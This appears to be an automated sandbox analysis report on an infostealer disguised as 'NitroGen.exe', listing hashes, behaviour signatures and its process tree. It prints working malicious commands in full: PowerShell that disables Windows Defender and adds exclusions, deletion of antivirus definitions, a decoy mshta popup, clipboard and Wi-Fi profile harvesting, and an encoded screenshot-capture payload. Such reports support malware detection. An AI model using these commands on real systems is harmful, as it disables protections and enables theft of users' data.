Analysis
-
max time kernel
12s -
max time network
18s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
28-11-2024 22:41
Behavioral task
behavioral1
Sample
NitroGen.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
NitroGen.exe
-
Size
6.9MB
-
MD5
ba33dc1895af57af38321718e62e7403
-
SHA1
5479a638e8f9b0a7134fa9378cb0d2a96e10c670
-
SHA256
cc646329ffca62adea11be2b49a8fb010d8e42ddfddad20f439a277e5d2b3fb6
-
SHA512
641c039aa7c30c2e9a8a256fd8d8924aba454d4f2fcd6b94b00b6476047825e4bbd39d8189a70215dd88c71d53e84ff9fd1dddaf8d087a9d5fcb1c3a55884c33
-
SSDEEP
98304:f7DjWM8JEE1FPA91aamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGhW:f70IeNTfm/pf+xk4dWRpmrbW3jmrU
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid Process 1284 MpCmdRun.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1356 powershell.exe 4668 powershell.exe 3564 powershell.exe 4764 powershell.exe 3212 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeNitroGen.exeattrib.exedescription ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts NitroGen.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid Process 332 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
NitroGen.exepid Process 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe 4396 NitroGen.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 ip-api.com 21 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid Process 232 tasklist.exe 3964 tasklist.exe 224 tasklist.exe 4276 tasklist.exe 3808 tasklist.exe -
Processes:
resource yara_rule behavioral1/files/0x002800000004504d-21.dat upx behavioral1/memory/4396-25-0x00007FFE3CEF0000-0x00007FFE3D4D8000-memory.dmp upx behavioral1/files/0x0028000000045040-27.dat upx behavioral1/memory/4396-32-0x00007FFE47C70000-0x00007FFE47C7F000-memory.dmp upx behavioral1/files/0x0028000000045047-48.dat upx behavioral1/files/0x0028000000045046-47.dat upx behavioral1/files/0x0028000000045045-46.dat upx behavioral1/files/0x0028000000045044-45.dat upx behavioral1/files/0x0028000000045043-44.dat upx behavioral1/files/0x0028000000045042-43.dat upx behavioral1/files/0x0028000000045041-42.dat upx behavioral1/files/0x002800000004503f-41.dat upx behavioral1/files/0x0028000000045052-40.dat upx behavioral1/files/0x0028000000045051-39.dat upx behavioral1/files/0x0028000000045050-38.dat upx behavioral1/files/0x002800000004504c-35.dat upx behavioral1/files/0x002800000004504a-34.dat upx behavioral1/memory/4396-31-0x00007FFE3DFA0000-0x00007FFE3DFC4000-memory.dmp upx behavioral1/files/0x002800000004504b-30.dat upx behavioral1/memory/4396-54-0x00007FFE3DDC0000-0x00007FFE3DDED000-memory.dmp upx behavioral1/memory/4396-56-0x00007FFE3E3E0000-0x00007FFE3E3F9000-memory.dmp upx behavioral1/memory/4396-58-0x00007FFE39D40000-0x00007FFE39D63000-memory.dmp upx behavioral1/memory/4396-60-0x00007FFE2F370000-0x00007FFE2F4E3000-memory.dmp upx behavioral1/memory/4396-62-0x00007FFE3C8D0000-0x00007FFE3C8E9000-memory.dmp upx behavioral1/memory/4396-67-0x00007FFE39D10000-0x00007FFE39D3E000-memory.dmp upx behavioral1/memory/4396-66-0x00007FFE3CEF0000-0x00007FFE3D4D8000-memory.dmp upx behavioral1/memory/4396-73-0x00007FFE3DFA0000-0x00007FFE3DFC4000-memory.dmp upx behavioral1/memory/4396-74-0x00007FFE2ED10000-0x00007FFE2F085000-memory.dmp upx behavioral1/memory/4396-76-0x00007FFE39C90000-0x00007FFE39CA4000-memory.dmp upx behavioral1/memory/4396-71-0x00007FFE2F090000-0x00007FFE2F148000-memory.dmp upx behavioral1/memory/4396-65-0x00007FFE42A80000-0x00007FFE42A8D000-memory.dmp upx behavioral1/memory/4396-78-0x00007FFE3DDC0000-0x00007FFE3DDED000-memory.dmp upx behavioral1/memory/4396-79-0x00007FFE401E0000-0x00007FFE401ED000-memory.dmp upx behavioral1/memory/4396-82-0x00007FFE2EBF0000-0x00007FFE2ED0C000-memory.dmp upx behavioral1/memory/4396-81-0x00007FFE3E3E0000-0x00007FFE3E3F9000-memory.dmp upx behavioral1/memory/4396-103-0x00007FFE39D40000-0x00007FFE39D63000-memory.dmp upx behavioral1/memory/4396-122-0x00007FFE2F370000-0x00007FFE2F4E3000-memory.dmp upx behavioral1/memory/4396-198-0x00007FFE3C8D0000-0x00007FFE3C8E9000-memory.dmp upx behavioral1/memory/4396-268-0x00007FFE2F090000-0x00007FFE2F148000-memory.dmp upx behavioral1/memory/4396-267-0x00007FFE39D10000-0x00007FFE39D3E000-memory.dmp upx behavioral1/memory/4396-286-0x00007FFE2ED10000-0x00007FFE2F085000-memory.dmp upx behavioral1/memory/4396-288-0x00007FFE3DFA0000-0x00007FFE3DFC4000-memory.dmp upx behavioral1/memory/4396-293-0x00007FFE2F370000-0x00007FFE2F4E3000-memory.dmp upx behavioral1/memory/4396-287-0x00007FFE3CEF0000-0x00007FFE3D4D8000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid Process 1764 WMIC.exe 4800 WMIC.exe 2096 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 55 IoCs
Processes:
WMIC.exepowershell.exepowershell.exeWMIC.exeWMIC.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exeWMIC.exeWMIC.exepowershell.exeWMIC.exepowershell.exepid Process 520 WMIC.exe 520 WMIC.exe 520 WMIC.exe 520 WMIC.exe 3564 powershell.exe 3564 powershell.exe 4668 powershell.exe 4668 powershell.exe 1764 WMIC.exe 1764 WMIC.exe 1764 WMIC.exe 1764 WMIC.exe 4800 WMIC.exe 4800 WMIC.exe 4800 WMIC.exe 4800 WMIC.exe 1356 powershell.exe 1356 powershell.exe 1356 powershell.exe 4700 WMIC.exe 4700 WMIC.exe 4700 WMIC.exe 4700 WMIC.exe 1196 powershell.exe 1196 powershell.exe 1564 powershell.exe 1564 powershell.exe 1196 powershell.exe 1564 powershell.exe 4764 powershell.exe 4764 powershell.exe 4764 powershell.exe 972 powershell.exe 972 powershell.exe 972 powershell.exe 3180 WMIC.exe 3180 WMIC.exe 3180 WMIC.exe 3180 WMIC.exe 3464 WMIC.exe 3464 WMIC.exe 3464 WMIC.exe 3464 WMIC.exe 2324 WMIC.exe 2324 WMIC.exe 2324 WMIC.exe 2324 WMIC.exe 3212 powershell.exe 3212 powershell.exe 2096 WMIC.exe 2096 WMIC.exe 2096 WMIC.exe 2096 WMIC.exe 4040 powershell.exe 4040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeWMIC.exetasklist.exepowershell.exedescription pid Process Token: SeDebugPrivilege 3564 powershell.exe Token: SeIncreaseQuotaPrivilege 520 WMIC.exe Token: SeSecurityPrivilege 520 WMIC.exe Token: SeTakeOwnershipPrivilege 520 WMIC.exe Token: SeLoadDriverPrivilege 520 WMIC.exe Token: SeSystemProfilePrivilege 520 WMIC.exe Token: SeSystemtimePrivilege 520 WMIC.exe Token: SeProfSingleProcessPrivilege 520 WMIC.exe Token: SeIncBasePriorityPrivilege 520 WMIC.exe Token: SeCreatePagefilePrivilege 520 WMIC.exe Token: SeBackupPrivilege 520 WMIC.exe Token: SeRestorePrivilege 520 WMIC.exe Token: SeShutdownPrivilege 520 WMIC.exe Token: SeDebugPrivilege 520 WMIC.exe Token: SeSystemEnvironmentPrivilege 520 WMIC.exe Token: SeRemoteShutdownPrivilege 520 WMIC.exe Token: SeUndockPrivilege 520 WMIC.exe Token: SeManageVolumePrivilege 520 WMIC.exe Token: 33 520 WMIC.exe Token: 34 520 WMIC.exe Token: 35 520 WMIC.exe Token: 36 520 WMIC.exe Token: SeDebugPrivilege 3964 tasklist.exe Token: SeDebugPrivilege 4668 powershell.exe Token: SeIncreaseQuotaPrivilege 520 WMIC.exe Token: SeSecurityPrivilege 520 WMIC.exe Token: SeTakeOwnershipPrivilege 520 WMIC.exe Token: SeLoadDriverPrivilege 520 WMIC.exe Token: SeSystemProfilePrivilege 520 WMIC.exe Token: SeSystemtimePrivilege 520 WMIC.exe Token: SeProfSingleProcessPrivilege 520 WMIC.exe Token: SeIncBasePriorityPrivilege 520 WMIC.exe Token: SeCreatePagefilePrivilege 520 WMIC.exe Token: SeBackupPrivilege 520 WMIC.exe Token: SeRestorePrivilege 520 WMIC.exe Token: SeShutdownPrivilege 520 WMIC.exe Token: SeDebugPrivilege 520 WMIC.exe Token: SeSystemEnvironmentPrivilege 520 WMIC.exe Token: SeRemoteShutdownPrivilege 520 WMIC.exe Token: SeUndockPrivilege 520 WMIC.exe Token: SeManageVolumePrivilege 520 WMIC.exe Token: 33 520 WMIC.exe Token: 34 520 WMIC.exe Token: 35 520 WMIC.exe Token: 36 520 WMIC.exe Token: SeIncreaseQuotaPrivilege 3564 powershell.exe Token: SeSecurityPrivilege 3564 powershell.exe Token: SeTakeOwnershipPrivilege 3564 powershell.exe Token: SeLoadDriverPrivilege 3564 powershell.exe Token: SeSystemProfilePrivilege 3564 powershell.exe Token: SeSystemtimePrivilege 3564 powershell.exe Token: SeProfSingleProcessPrivilege 3564 powershell.exe Token: SeIncBasePriorityPrivilege 3564 powershell.exe Token: SeCreatePagefilePrivilege 3564 powershell.exe Token: SeBackupPrivilege 3564 powershell.exe Token: SeRestorePrivilege 3564 powershell.exe Token: SeShutdownPrivilege 3564 powershell.exe Token: SeDebugPrivilege 3564 powershell.exe Token: SeSystemEnvironmentPrivilege 3564 powershell.exe Token: SeRemoteShutdownPrivilege 3564 powershell.exe Token: SeUndockPrivilege 3564 powershell.exe Token: SeManageVolumePrivilege 3564 powershell.exe Token: 33 3564 powershell.exe Token: 34 3564 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
NitroGen.exeNitroGen.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 5088 wrote to memory of 4396 5088 NitroGen.exe 81 PID 5088 wrote to memory of 4396 5088 NitroGen.exe 81 PID 4396 wrote to memory of 2956 4396 NitroGen.exe 82 PID 4396 wrote to memory of 2956 4396 NitroGen.exe 82 PID 4396 wrote to memory of 2668 4396 NitroGen.exe 83 PID 4396 wrote to memory of 2668 4396 NitroGen.exe 83 PID 4396 wrote to memory of 1292 4396 NitroGen.exe 84 PID 4396 wrote to memory of 1292 4396 NitroGen.exe 84 PID 4396 wrote to memory of 4332 4396 NitroGen.exe 87 PID 4396 wrote to memory of 4332 4396 NitroGen.exe 87 PID 4396 wrote to memory of 228 4396 NitroGen.exe 90 PID 4396 wrote to memory of 228 4396 NitroGen.exe 90 PID 2668 wrote to memory of 3564 2668 cmd.exe 92 PID 2668 wrote to memory of 3564 2668 cmd.exe 92 PID 228 wrote to memory of 520 228 cmd.exe 93 PID 228 wrote to memory of 520 228 cmd.exe 93 PID 1292 wrote to memory of 1232 1292 cmd.exe 94 PID 1292 wrote to memory of 1232 1292 cmd.exe 94 PID 4332 wrote to memory of 3964 4332 cmd.exe 95 PID 4332 wrote to memory of 3964 4332 cmd.exe 95 PID 2956 wrote to memory of 4668 2956 cmd.exe 96 PID 2956 wrote to memory of 4668 2956 cmd.exe 96 PID 4396 wrote to memory of 2372 4396 NitroGen.exe 99 PID 4396 wrote to memory of 2372 4396 NitroGen.exe 99 PID 2372 wrote to memory of 2204 2372 cmd.exe 154 PID 2372 wrote to memory of 2204 2372 cmd.exe 154 PID 4396 wrote to memory of 4116 4396 NitroGen.exe 102 PID 4396 wrote to memory of 4116 4396 NitroGen.exe 102 PID 4116 wrote to memory of 4516 4116 cmd.exe 104 PID 4116 wrote to memory of 4516 4116 cmd.exe 104 PID 4396 wrote to memory of 1800 4396 NitroGen.exe 105 PID 4396 wrote to memory of 1800 4396 NitroGen.exe 105 PID 1800 wrote to memory of 1764 1800 cmd.exe 143 PID 1800 wrote to memory of 1764 1800 cmd.exe 143 PID 4396 wrote to memory of 2004 4396 NitroGen.exe 148 PID 4396 wrote to memory of 2004 4396 NitroGen.exe 148 PID 2004 wrote to memory of 4800 2004 cmd.exe 110 PID 2004 wrote to memory of 4800 2004 cmd.exe 110 PID 2668 wrote to memory of 1284 2668 cmd.exe 111 PID 2668 wrote to memory of 1284 2668 cmd.exe 111 PID 4396 wrote to memory of 4272 4396 NitroGen.exe 112 PID 4396 wrote to memory of 4272 4396 NitroGen.exe 112 PID 4272 wrote to memory of 1356 4272 cmd.exe 114 PID 4272 wrote to memory of 1356 4272 cmd.exe 114 PID 4396 wrote to memory of 1328 4396 NitroGen.exe 115 PID 4396 wrote to memory of 1328 4396 NitroGen.exe 115 PID 4396 wrote to memory of 2428 4396 NitroGen.exe 116 PID 4396 wrote to memory of 2428 4396 NitroGen.exe 116 PID 1328 wrote to memory of 224 1328 cmd.exe 119 PID 1328 wrote to memory of 224 1328 cmd.exe 119 PID 4396 wrote to memory of 464 4396 NitroGen.exe 120 PID 4396 wrote to memory of 464 4396 NitroGen.exe 120 PID 4396 wrote to memory of 4020 4396 NitroGen.exe 122 PID 4396 wrote to memory of 4020 4396 NitroGen.exe 122 PID 4396 wrote to memory of 3004 4396 NitroGen.exe 124 PID 4396 wrote to memory of 3004 4396 NitroGen.exe 124 PID 4396 wrote to memory of 1364 4396 NitroGen.exe 127 PID 4396 wrote to memory of 1364 4396 NitroGen.exe 127 PID 464 wrote to memory of 4700 464 cmd.exe 129 PID 464 wrote to memory of 4700 464 cmd.exe 129 PID 4396 wrote to memory of 1396 4396 NitroGen.exe 130 PID 4396 wrote to memory of 1396 4396 NitroGen.exe 130 PID 4396 wrote to memory of 2228 4396 NitroGen.exe 131 PID 4396 wrote to memory of 2228 4396 NitroGen.exe 131 -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid Process 4480 attrib.exe 4708 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NitroGen.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NitroGen.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3564
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:1284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('generating codes please hang tight', 0, 'generating', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('generating codes please hang tight', 0, 'generating', 0+16);close()"4⤵PID:1232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:1764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:4800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2428
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:1196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3004
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1364
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1396 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2228
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:4840
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1